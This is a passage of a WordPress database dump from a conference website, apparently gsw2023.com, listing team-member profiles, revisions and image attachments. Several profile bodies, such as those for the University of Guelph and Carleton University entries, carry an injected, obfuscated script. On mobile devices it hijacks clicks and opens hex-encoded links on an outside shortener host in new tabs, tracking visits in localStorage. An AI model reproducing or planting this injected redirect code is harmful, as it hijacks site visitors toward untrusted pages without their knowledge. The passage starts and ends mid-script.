os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Executive Local Committee','','inherit','closed','closed','','4849-revision-v1','','','2023-09-06 06:20:50','2023-09-06 06:20:50','',4849,'https://gsw2023.com/?p=5466',0,'revision','',0),
(5468,1,'2023-09-11 10:36:24','2023-09-11 10:36:24','<!-- wp:paragraph --><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span>\r\n<p>University of Guelph</p>\r\n<!-- /wp:paragraph --><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_end\">﻿</span>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Prof. Mohamad abou el nasr','','publish','closed','closed','','mohamad-abou-el-nasr','','','2023-09-11 11:18:12','2023-09-11 11:18:12','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=5468',0,'dt_team','',0),
(5470,1,'2023-09-11 10:35:32','2023-09-11 10:35:32','','nasr','','inherit','open','closed','','nasr','','','2023-09-11 10:35:32','2023-09-11 10:35:32','',5468,'https://gsw2023.com/wp-content/uploads/2023/09/nasr.jpg',0,'attachment','image/jpeg',0),
(5471,1,'2023-09-11 10:39:31','2023-09-11 10:39:31','','nasr','','inherit','open','closed','','nasr-2','','','2023-09-11 10:39:31','2023-09-11 10:39:31','',5468,'https://gsw2023.com/wp-content/uploads/2023/09/nasr-1.jpg',0,'attachment','image/jpeg',0),
(5473,1,'2023-09-11 10:47:34','2023-09-11 10:47:34','','Mohamad Abou El Nasr','','inherit','open','closed','','nasr-3','','','2023-09-11 10:48:10','2023-09-11 10:48:10','',5468,'https://gsw2023.com/wp-content/uploads/2023/09/nasr-2.jpg',0,'attachment','image/jpeg',0),
(5474,1,'2023-09-11 10:55:09','2023-09-11 10:55:09','','nasr','','inherit','open','closed','','nasr-4','','','2023-09-11 10:55:09','2023-09-11 10:55:09','',5468,'https://gsw2023.com/wp-content/uploads/2023/09/nasr-3.jpg',0,'attachment','image/jpeg',0),
(5475,1,'2023-09-11 11:18:07','2023-09-11 11:18:07','<!-- wp:paragraph --><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span>\n<p>Carleton University</p>\n<!-- /wp:paragraph --><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_end\">﻿</span>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const 